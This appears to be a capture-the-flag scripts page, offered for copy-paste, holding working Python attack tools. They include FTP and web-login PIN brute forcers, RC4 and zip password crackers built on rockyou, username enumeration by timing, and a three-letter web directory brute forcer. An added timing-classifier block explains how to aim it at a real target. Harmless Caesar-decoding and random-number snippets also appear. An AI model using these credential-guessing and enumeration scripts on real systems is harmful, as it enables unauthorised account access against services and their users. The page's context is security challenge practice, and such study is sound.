Examples and Quick Scripts
This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!

Python

FTP Brute Force

Brute forces every password in words.txt for the username secure_user. Each attempt sits in a try/except block: ftplib raises error_perm on a 530 "login incorrect" reply, which just moves the loop on to the next word, and the first password the server accepts is printed before the loop stops.

```python
from ftplib import FTP, error_perm
import time

HOST = 'services.ftp.site'
PORT = 2121
USER = 'secure_user'
dictionary = 'words.txt'

ftp = FTP()
ftp.set_debuglevel(2)   # echoes the whole FTP conversation; set to 0 for a quieter run

with open(dictionary, 'r') as f:
    for line in f:
        password = line.strip('\n')
        print('trying ' + password)
        time.sleep(0.001)
        try:
            ftp.connect(HOST, PORT)
            ftp.login(user=USER, passwd=password)
        except error_perm:
            # 530 Login incorrect: wrong password, close this control
            # connection and move on to the next word
            ftp.close()
            continue
        # login() returned without raising, so the server accepted this password
        print(f'Found: {password}')
        ftp.quit()
        break
```

RC4 Brute Force

ARC4 brute forcing script that tries every key in big_set.txt against a captured ciphertext. Each decryption is then tested to see whether it is readable text: a UnicodeDecodeError means it is not valid UTF-8, and a decode that succeeds but contains control characters is skipped as well, since plenty of wrong keys still happen to produce valid UTF-8 bytes. I chose not to pause or quit the loop because I was getting some false positives.

```python
from arc4 import ARC4

# Ciphertext to recover, as captured in the challenge
cipher = b'\x55\x34\xe1\xb2\x17\xdc\x2a\xc5\x21\x26\x77\xe3\xae\x56\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'

with open("big_set.txt", "r") as keys:
    for line in keys:
        key = line.strip()
        if not key:
            continue
        # RC4 is a stream cipher: decrypt is an XOR with the keystream for this key
        plain = ARC4(key.encode('utf-8')).decrypt(cipher)
        try:
            text = plain.decode('utf-8')
        except UnicodeDecodeError:
            continue   # not UTF-8, almost certainly the wrong key
        # Require printable text (tabs/newlines allowed) to cut down the false positives
        if all(c.isprintable() or c in '\r\n\t' for c in text):
            print("Key " + key + " made this:\n" + text)
```

Zip File Brute Force Guess with B64 Password

This script attempts to unzip an archive with each password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. The second part is a try/except that swallows the error a wrong password raises (zipfile raises RuntimeError for a bad password; a wrong password that slips past the one-byte ZipCrypto check surfaces as BadZipFile or zlib.error instead) and stops at the first password that extracts cleanly.
Alternatively, one could pull the zip hash with zip2john and feed john or hashcat a copy of rockyou with every line base64 encoded. I chose NOT to do this to avoid keeping an extra rockyou-sized file full of base64.

```python
import base64
import zipfile
import zlib

dictionary = '/mnt/d/hashcat-6.0.0/rockyou.txt'
archive = './base64.zip'

# Open the archive once instead of re-reading it for every candidate
with zipfile.ZipFile(archive, 'r') as zip_ref, \
        open(dictionary, 'r', errors='ignore') as f:
    for line in f:
        password = line.strip('\n')
        #print(f'Raw password is {password}')
        encoded = base64.b64encode(password.encode())
        #print(f'Encoded password is {encoded}')
        try:
            zip_ref.extractall(pwd=encoded)
        except (RuntimeError, zipfile.BadZipFile, zlib.error):
            continue   # wrong password, try the next line
        print(f'Found! Password is {password}, encoded is {encoded.decode()}!')
        break
```

Connect to a Website, Establish Session, and Send Data

A requests.Session keeps the TCP connection alive between requests instead of opening a new one each time, and it also carries any cookies set by the GET over to the POST, which a challenge that hands out a code and nonce usually relies on. Parsing the JSON body natively means the values can be picked out and sent straight back.

```python
import requests

url = 'https://captcha.lol'
header = {'User-Agent': 'bot'}

s = requests.Session()          # connection reuse plus a shared cookie jar
r = s.get(url, headers=header)

ans = r.json()                  # parse the JSON body into a dict

code = ans['code']
nonce = ans['nonce']
print(code)
print(nonce)

# json= serialises the dict and sets Content-Type: application/json
p = s.post(url, json=ans, headers=header)
print(p.text)
```

PIN Brute Force for Web Login

This script adds a PIN guess to a web login attempt. The PIN is zfilled, which turns 4 into 004. A substring check on the response tells whether access was denied or not; on the first response without "Access Denied" the PIN is printed and the loop breaks. Every miss also prints the status code and body length, since a response that differs in size or code from the rest is a hint even when the denial string is still there. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.

```python
import requests

url = "https://vuln.server/admin_login"

for pin in range(1000):
    guess = str(pin).zfill(3)   # 4 -> '004'
    #headers = {'Cookie' : 'PHPSESSID=qhq84atma883hio9eso7hhsr4j'}
    payload = {'email': '[email protected]', 'password': guess}
    req = requests.post(url, data=payload, allow_redirects=True)
    if 'Access Denied' not in req.text:
        print(f'\npin is {guess}!\n')
        break
    # status code and body length for each miss: a change in either is worth a look
    print(guess, req.status_code, len(req.content))

print('finished testing')
```

Username Guessing based on Timing Analysis

This script pays attention to the server's response time for each candidate username to help determine whether it is valid: a login that consistently takes longer usually means the account exists, because the server only goes on to hash and compare the password for a real user.

```python
import requests
from string import ascii_lowercase

URL = 'http://m4lwhere.org/login.php'

with open('surnames.txt') as f:
    lines = f.read().splitlines()

# Candidate usernames are first initial + surname, e.g. jsmith
for lname in lines:
    for init in ascii_lowercase:
        username = init + lname
        r = requests.post(URL, data={'user': username, 'pass': 'haha'})
        roundtrip = r.elapsed.total_seconds()   # time from sending the request to parsing the response headers
        print(f'{roundtrip} for {username}')
```
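A single measurement per username is noisy. The following is an added example, not code from the original page, of how to turn raw timings like the ones printed above into a verdict: take several interleaved samples per candidate, use the median so one slow round trip does not skew a name, and flag names whose median is well above the median across all candidates (which assumes most candidates are invalid, the usual case during enumeration). The login endpoint is replaced by a constructed stand-in, fake_login_time, where only the made-up account jsmith is valid; CANDIDATES, VALID_USERS and the timings are all invented for the demo.

```python
import random
import statistics

# Constructed stand-in for the login endpoint: only "jsmith" exists, and the
# pretend server spends ~250 ms more on real accounts (password hashing).
VALID_USERS = {"jsmith"}
CANDIDATES = ["asmith", "bsmith", "jsmith", "ajones", "bjones", "jjones", "abrown", "jbrown"]


def fake_login_time(username, rng):
    base = 0.30 if username in VALID_USERS else 0.05
    return base + rng.uniform(-0.005, 0.005)   # a little network jitter


def collect(usernames, rounds, measure, rng):
    """Take `rounds` measurements per username, interleaved so that a slow
    patch of network hits every candidate about equally."""
    samples = {u: [] for u in usernames}
    for _ in range(rounds):
        for u in usernames:
            samples[u].append(measure(u, rng))
    return samples


def classify_by_timing(samples, ratio=2.0):
    """Return the usernames whose median response time is more than `ratio`
    times the median over all candidates. Assumes most candidates are invalid,
    so the overall median is a fair baseline for the 'no such user' path."""
    medians = {u: statistics.median(t) for u, t in samples.items()}
    baseline = statistics.median(medians.values())
    return sorted(u for u, m in medians.items() if m > ratio * baseline)


def demo(seed=1, candidates=CANDIDATES, rounds=7):
    """Run the whole pipeline against the fake endpoint with a fixed seed."""
    rng = random.Random(seed)
    samples = collect(candidates, rounds, fake_login_time, rng)
    return classify_by_timing(samples)


if __name__ == "__main__":
    print("likely valid:", demo())   # ['jsmith']
```

Against a real target, pass `collect` a function that does the POST and returns `r.elapsed.total_seconds()` (it can ignore the rng argument); keep the rounds interleaved rather than hammering one username at a time, otherwise a burst of latency lands on a single candidate and looks like a hit.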

Connect to Raw Socket and Pass Data

This challenge required connecting to the socket and brute forcing the first byte back. I didn't fully finish this challenge because it was a little frustrating, and I need to spend more time on this script.

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('cfta-ne01.allyourbases.co', 8017))

buf = s.recv(1024)   # first banner chunk
s.recv(1024)         # a second chunk follows that we do not need; read it and drop it

# The server sends escaped unicode (e.g. \u00e9): unescape it, re-encode the
# code points as latin-1 bytes and decode those as UTF-8 to get real characters
conv = buf.decode('unicode-escape').encode('latin1').decode('UTF-8')
conv = conv + '\n'
print(conv)

s.sendall(bytes(conv, encoding='UTF-8'))   # echo the decoded text back
ans = s.recv(1024)
win = ans.decode('unicode-escape').encode('latin1').decode('UTF-8')
print(win)
s.close()
```

The second attempt opens a fresh connection for every candidate character:

```python
import socket

HOST, PORT = 'challenges.ctf.lol', 30468

# One connection per guess, every ASCII value from 'A' to 'z'
# (this range also covers the punctuation between 'Z' and 'a')
for i in range(ord('A'), ord('z') + 1):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print(f'trying {chr(i)}')
    s.connect((HOST, PORT))
    print(s.recv(1024))                          # prompt / banner
    s.sendall(bytes(chr(i), encoding='utf8'))    # send the guess
    print(s.recv(1024))                          # server's verdict
    s.close()
```

ROT13 Automatic Decoder

Written by Jess! Tries all 26 shifts and uses the enchant library to check the decoded words against an English dictionary, so the right shift stands out automatically. Despite the heading it works for any Caesar shift, not just ROT13, very cool!

```python
import enchant

d = enchant.Dict("en_US")


def unshift(text, n):
    """Undo a Caesar shift of n on the letters of text, leaving everything else alone."""
    out = ""
    for ch in text:
        if 'a' <= ch <= 'z':
            out += chr((ord(ch) - 97 - n) % 26 + 97)
        elif 'A' <= ch <= 'Z':
            out += chr((ord(ch) - 65 - n) % 26 + 65)
        else:
            out += ch
    return out


cipher = input("Enter Caesar Shift Cipher to Decode: ")
for n in range(26):
    decode = unshift(cipher, n)
    # Score the candidate by how many of its words the en_US dictionary knows
    words = [w.strip('.,!?;:') for w in decode.split()]
    words = [w for w in words if w]
    hits = sum(1 for w in words if d.check(w))
    wordfound = "Found!" if words and hits == len(words) else ""
    print(n, decode, f"{hits}/{len(words)} words", wordfound)
```
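When enchant is not installed, or the text has no spaces to split into words, the shift can still be recovered from letter frequencies alone. The block below is an added example, not code from the original page: it undoes every possible shift and scores each candidate with a chi-squared statistic against standard English letter frequencies, picking the shift whose output looks most like English. It assumes the plaintext is English; the ROT13 sample in the main block is constructed for the demo.

```python
import string
from collections import Counter

# Expected letter frequencies (percent) in English text, a..z
ENGLISH_FREQ = [8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966,
                0.153, 0.772, 4.025, 2.406, 6.749, 7.507, 1.929, 0.095, 5.987,
                6.327, 9.056, 2.758, 0.978, 2.360, 0.150, 1.974, 0.074]


def caesar_shift(text, n):
    """Shift every ASCII letter by n positions (negative n shifts back)."""
    out = []
    for ch in text:
        if 'a' <= ch <= 'z':
            out.append(chr((ord(ch) - 97 + n) % 26 + 97))
        elif 'A' <= ch <= 'Z':
            out.append(chr((ord(ch) - 65 + n) % 26 + 65))
        else:
            out.append(ch)
    return ''.join(out)


def chi_squared(text):
    """How far the letter counts of text are from English; lower is more English-like."""
    letters = [c for c in text.lower() if 'a' <= c <= 'z']
    if not letters:
        return float('inf')
    counts = Counter(letters)
    total = len(letters)
    score = 0.0
    for i, c in enumerate(string.ascii_lowercase):
        expected = ENGLISH_FREQ[i] / 100 * total
        score += (counts[c] - expected) ** 2 / expected
    return score


def crack_caesar(ciphertext):
    """Return (shift, plaintext): the shift whose undoing looks most like English."""
    shift = min(range(26), key=lambda n: chi_squared(caesar_shift(ciphertext, -n)))
    return shift, caesar_shift(ciphertext, -shift)


if __name__ == "__main__":
    # constructed sample: ROT13 of a Dickens line
    sample = "Vg jnf gur orfg bs gvzrf, vg jnf gur jbefg bs gvzrf"
    print(crack_caesar(sample))   # (13, 'It was the best of times, it was the worst of times')
```

The statistic needs a few dozen letters to be reliable; on a very short ciphertext fall back to printing all 26 candidates, as the dictionary version above does, and eyeball them.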

Choose Random Numbers

This program chooses some random integers and drops them into a string. Nothing fancy.

```python
import random

# random is fine for picking a book and page; it is not a CSPRNG, so reach for
# the secrets module whenever the value has to be unguessable (tokens, keys)
series = random.randint(1, 3)
book = random.randint(1, 6)
page = random.randint(1, 300)

print(f'Series {series}, Book {book}, Page {page}\n\n')
```

List of all Characters from aa to zz:

Quick way to create a list of all possible two-letter lowercase values

```python
from string import ascii_lowercase

for a in ascii_lowercase:
    for b in ascii_lowercase:
        print(a + b)
```
Below is brute forcing all three-letter lowercase names to find a hidden web directory; anything that does not come back as a 404 is printed.

```python
import requests
from string import ascii_lowercase

url = 'http://m4lwhere.org/'

# Every aaa..zzz path (26**3 = 17576 requests); anything other than 404 is interesting
for a in ascii_lowercase:
    for b in ascii_lowercase:
        for c in ascii_lowercase:
            #print(a+b+c)
            fullUrl = url + a + b + c
            r = requests.get(fullUrl)
            if r.status_code != 404:
                print(f'Code {r.status_code} for {fullUrl}')
```
Same one, just with a progress bar! The bar is sized to the full 26**3 candidates and advanced once per request, hit or miss, so it actually reaches 100%.

```python
import requests
from progress.bar import Bar
from string import ascii_lowercase

url = 'http://m4lwhere.org/'

with Bar('Brute Forcing...', max=26**3) as bar:
    for a in ascii_lowercase:
        for b in ascii_lowercase:
            for c in ascii_lowercase:
                #print(a+b+c)
                fullUrl = url + a + b + c
                r = requests.get(fullUrl)
                if r.status_code != 404:
                    print(f'\nCode {r.status_code} for {fullUrl}')
                bar.next()   # advance on every request, not only on misses
```
Last modified 5mo ago